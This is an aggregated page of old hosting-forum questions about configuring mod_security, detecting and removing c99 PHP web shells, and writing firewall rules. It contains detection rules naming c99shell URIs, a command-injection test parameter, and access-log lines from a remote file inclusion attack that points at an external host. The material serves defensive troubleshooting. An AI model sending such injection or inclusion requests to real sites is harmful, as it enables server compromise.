C99Shell :: Attack Rules For Mod_security

Oct 3, 2007

I want to prevent c99shell scripts from running.

I found this rule to detect URIs for the c99 shell.

#new kit
SecFilterSelective REQUEST_URI "/c99shell.txt"
SecFilterSelective REQUEST_URI "/c99.txt?"

My problem is that the hackers are being more stealthy and calling the script some random name like .../myphpstuff.php. So the URI no longer helps detect it.

How could I detect "c99shell" in the actual file that Apache serves? This assumes that the hacker was successful in installing it.

my box

Apache 1.3.37
WHM 11.2.0 cPanel 11.11.0-R16983
FEDORA 5 i686 - WHM X v3.1.0


Mod_security & C99shell Anyone Help Please ?

Jun 5, 2007

I installed modsecurity from the Addon module in cPanel.

When I try phpshell, it works fine without errors and I can do anything, despite the presence of modsecurity protection and disable_functions in php.ini.

Is there a particular setting to add to httpd.conf to prevent phpshell from being used or to prevent it from being uploaded to the site?


Mod_security Rules

May 25, 2009

Is it possible to disable a particular mod_security rule for a particular directory, or are the rules global?


Mod_security Rules In WHM

Aug 15, 2008

I just installed mod_security via WHM, and want to know what rule I should enter to prevent some URLs from being opened.

For example, if the URL contains the word "abc" (like domain.com/some_folder/abc/file.php), it should not be opened.


How To Set The Rules Of MOD_Security

Jun 4, 2008

How to set the rules of MOD_Security?

Another question for professionals:

Q: What are the best rules to secure my server? I'd appreciate if you managed to attach these rules to your replies. // FYI, I host VBulletin portals.


Mod_security 2 Rules

Feb 25, 2008

make these rules work on Apache 2 mod_security 2?


Mod_security 2 Rules

Dec 17, 2008

Any good secure rules for mod_security 2 that work well for shared servers?

Can someone share what rules you are using to secure your shared servers? Have tried a few different sets of rules, but a few customers always end up with errors, and disabling it for their domain name doesn't sound like a safer option for them or the server.

Share your mod_sec 2 rules.


Mod_security 2 Rules

May 10, 2008

Is there any difference with the old one?

I have a customized modsecurity.conf file in my old Apache 1.3 server. Is it ok to copy it to new modsec2.conf?


Setting The Right Rules For Mod_Security

Nov 6, 2009

We were recently hacked on our dedicated server and the hacker managed to insert PHP files that generated thousands of doorway pages in one of our images folders on our site. We have done an extensive cleanup of our site, removing all malicious files, and are locking down the server. We have already updated to the latest versions of PHP and WordPress, not to mention changed all database passwords and the admin password. My question is about mod_security for Apache.

We were told Mod_security can prevent this from happening again but it must be configured correctly.

We have already set rules for mod_security. The rules set up are in the files in the directory, /etc/httpd/modsecurity.d/modsec. We were told that the file 10_asl_rules.conf specifically has filters to prevent SQL injection attacks.

These are our current rules:
----------------------------------------------------------------------
/etc/httpd/modsecurity.d/modsec
# ls
05_asl_exclude.conf 30_asl_antispam.conf domain-blacklist-local.txt malware-blacklist.txt
05_asl_scanner.conf 30_asl_antispam_referrer.conf domain-blacklist.txt sql.txt
10_asl_antimalware.conf 40_asl_apache2-rules.conf domain-spam-whitelist.conf trusted-domains.conf
10_asl_rules.conf 50_asl_rootkits.conf domain-spam-whitelist.txt trusted-domains.txt
11_asl_data_loss.conf 60_asl_recons.conf malware-blacklist-high.txt whitelist.txt
20_asl_useragents.conf 99_asl_exclude.conf malware-blacklist-local.txt
30_asl_antimalware.conf 99_asl_jitp.conf malware-blacklist-low.txt
-----------------------------------------------------------------

I can do to prevent this or tune up apache mod_security from letting this happen again. We are so paranoid that we are now checking our access log files for POST commands every day?


Gotroot Rules With Mod_security

Jul 2, 2009

I'm using a VPS with CentOS 5 and cPanel/WHM with Apache 2.2.

I'm trying to figure out how to use the gotroot rules with mod_security. I had enabled mod_security with EasyApache. I tried to follow some other posts I had found around on other forums with no luck really; with that said, I am a Linux noob. I had tried to follow the wiki on atomic sites <-- not enough posts so I can't do links, sorry, but I found it hard to understand because I don't have a modsecurity.config file that I can find, and I also can't find AddModule mod_security.c in my httpd.config, but I did find this line: Include "/usr/local/apache/conf/modsec2.conf". My thing is I'm looking for a complete noob guide on how to use gotroot rules with mod_security enabled through EasyApache, or would it be easier to manually install mod_security?


Mod_security Rules & 500 Error

Nov 4, 2009

I have Modsec 2.5.9 and I am using the default rules provided by cPanel. When I try to update the rules along with the default rules given by cPanel, I am getting an internal server error (500 Error).

The rules I tried to implement are from

Quote:

[url]


Updating Mod_Security Rules

May 1, 2009

How can I update mod_security rules in Cpanel/WHM server from gotroot.com?


Best Mod_security Rules Site

Apr 29, 2008

I doubt anyone is writing their own rules, so what do you think is the best site for mod_security rules which are strong but also do not result in many false positives?

I know of [url] posts rules but is there anyone else worth mentioning?


Redistributable And DFSG-free Mod_security Rules

Mar 23, 2009

I'm the main author of a control panel, and we are working toward security enforcement. So we are looking at what kinds of rules we can add in mod_security.

The issue is that our control panel is open source, and that, even if I have found some nice mod_security rule sets on the internet (for example at gotroot.com), I need to get some that are FREE (as freedom), and that I can include in our project.

What I am looking for is application specific rules (like the ones preventing phpBB highlight insertions, for example), so having someone using an old version of a given software on his hosting space is not an issue anymore.


Mod_security With Gotroot Rules Filtering Out Firefox

Feb 4, 2008

I just wanted to confirm if you guys had the same problem. It seems that mod_security with gotroot rules for apache 1.3 is filtering out firefox. Everything works fine with IE. With the latest firefox I get this for any page requested:

mod_security-message: Access denied with code 500. Pattern match "^GET (http|https|ftp):/" at THE_REQUEST [severity "EMERGENCY"]


C99Shell :: How To Detect Or Disable The Functionality Of C99Shell

Jul 13, 2008

Recently my site was defaced (I own a dedicated server). My server was not touched, but one of the applications I used on the site was exploited to gain access to it.

I have noticed 4 or 5 c99 shells in different locations on my FTP. The site is back online, but it's definitely possible that they have one of these hidden somewhere and that they'll just do it again. I am using CentOS 5.

How can I easily search for these on my box? Can I disable their functionality? Is there a setting I can use in htaccess or something to make my website safer? I visited one of the scripts, and it said SAFEMODE OFF; how can I at least enable safemode?

I don't know much of anything about linux, but I am running cpanel and WHM. I have a guy who manages my box but he is hard to get a hold of sometimes, and I'd like to take care of this ASAP!


Common Attack To Test Mod_security

Jul 22, 2008

I just installed mod_security and would like to test some common attacks to see if it's blocking them.

I tried passing "cmd=uname -a" as a parameter to a .php, but it didn't block it. Any other test I can try?

I'm using almost all rules from gotroot


Anybody Know How To Block This Specific PHP Inject Attack Using Mod_Security

Jun 17, 2008

How to block the following "WEB-PHP remote include path" attack using mod_security?

I have tried using the default Mod_Security and also Mod_security from [url]

But it seems that mod_security is not functioning well, in that the PHP inject script is still able to run on my server.

The following is the WEB-PHP remote include path that I mentioned, taken from the Apache access log.

=================================

127.0.0.1 - - [15/Jun/2008:15:09:02 +0800] "GET /?path_escape=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
127.0.0.1 - - [15/Jun/2008:15:18:30 +0800] "GET /?path_escape=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473 ....


C99Shell Folders?

Jul 30, 2009

I found these folders in the root

/usr/bin/c99

/usr/include/boost/numeric/interval/detail/c99_rounding_control.hpp

/usr/include/boost/numeric/interval/detail/c99sub_rounding_control.hpp

What are these? Are these normal folders, or did somebody hack our server?

What shall I do?


Trojan C99Shell

Jul 1, 2009

I just installed Zen Cart on my web hosting and a few days later I saw some files named like core1405.php, and when I opened one to view it, it was actually the c99shell trojan.

I have deleted all of the core files. Now how can I prevent it from happening again? Because it is too much work to clean up the hosting server.


C99Shell How To Stop

Nov 5, 2009

How to stop scripts like c99 shell from being installed on the server?


C99Shell Hackers Killing Me!

Jun 25, 2007

Guys, I'm tired of fighting those hackers every day! I have about 20 websites, and every day I have one of them hacked! I restore a backup, then another one is hacked!

That's unbelievable!!!

Those bastards upload their shell scripts to websites via bugs or whatever from PHP files!!

Is there any way to stop these commands?

Can .htaccess help? How?

I talked to my web hosting companies for my websites! ....


C99shell Disable PHP Scripts?

Sep 3, 2007

The biggest security issue I have with my clients is the PHP c99 shell and similar PHP files; somehow these files get uploaded to the website and from there they start attacking the websites.
I have also seen that once you upload the c99 PHP file you are able to see the account information (such as a user name) on the same server.

So is there any way to disable this kind of PHP file, or at least disable some functions within the file?

I have been thinking of installing and running an antivirus on the server, but I see sometimes they upload the encrypted version of the file, so the antivirus can't catch the file as a trojan!


C99Shell :: Detect And Disable C99 Shell?

Aug 15, 2008

How can I detect and disable C99 shell and other shell scripts, e.g. r57 ....


C99Shell Stop Shell Hacking Totally?

Oct 19, 2007

Is there a way to stop them totally? i.e. even though they are successfully uploaded but I do not want the source to be available to them etc.?

I mean, is there a way to hide or not allow them to execute any shell?


C99Shell :: Protect My Server For Shell Attacks Via C99 And H57?

Sep 1, 2008

I have a few scripts, but hackers again upload c99 in some way, and hack some SMF forums on the server. The server itself they cannot hack, but user accounts they can. So please tell me what you advise?


Why Lunarpages Rules

Aug 9, 2006

I signed up with Lunarpages a while back for a dedicated server for my business. Good price, managed hosting rocks, decent disk space... little problem once with a huge power outage, but **** happens, cool.

All is well until I wake up this morning to an email a minute about a failed cron job. It smells fishy, so I contact Lunarpages support to see what's up.

They inform me that some asswad had managed to brute force into my server using a temporary account I set up a while back for some tech support. (I prefaced this with 'I'm an idiot', so now you know why.)
Either way, my server now has a rootkit, plus other **** I'm sure I'm not aware of... so they propose to move me to a brand new fresh box. I'm thinking they are gonna charge me a fee for this, a fee for that... no way. All is free of charge.

I'm ****ting kittens now.

So I'm resetting everything up, and I manage to lock myself out of my database... (I told you I was an idiot... and this was a looooong day already)

They fix it. Again. No problem...

If you are looking for a dedicated server, go to Lunarpages. Otherwise you are a freaking idiot as far as I am concerned...
Lunarpages, I love you, I want your babies...

PS: I am in no way affiliated with Lunarpages... however, if they want to give me a free year on their servers, I wouldn't complain... *hint hint*


Iptables Rules

Jul 2, 2009

One of my low-knowledge areas is iptables rules; I just normally use APF/CSF.

However, on a VPS host node, I basically want to block all access to a certain port, let's say 1234, apart from a certain IP address.

However, I don't want to block this port on any of the VPSs on the node, so what iptables rule(s) would I need to put into a bash script on startup?


Ip6tables Rules

May 26, 2009

I want to block icmp6 and traceroute on my IPv6 server. How can I do it?


How To Create Rules

Mar 15, 2008

I have a Windows 2003 server.

IIS 6.
PHP 5.x
MySQL 5.0

How to create rules so that an IP with 5 hit/s is blacklisted and auto-banned with IPSec?

when test attack file .php
info test :
using code attack files.
attack file test.php ( code files : <?php echo "we are test" ; ?> )
Ex : attack files test.php ( http://mydomain.php/test.php )
attack 200hit/s ( all files .php is not run ) php application is hang.

also wherewith code attack. i tested asp, html. it isn't problem. ( 1879hit/s ) ( good working)

How to create rules to ban an IP with 5 hit/s?


Can I Have Mod_security2 Rules

Nov 28, 2007

I've just upgraded to Apache 2.2 and modsecurity2.

There is a difference between modsec1 and modsec2 rules, so I can't use modsecurity1 rules.

So can I have rules for modsecurity2?

And can you tell me how I create new rules?

In modsecurity1 I just do this:

Code:
SecFilter "cmd"

In modsecurity2 I tried:

Code:
SecRule "cmd"

but it didn't work.

Copyrights 2005-15 www.BigResource.com, All rights reserved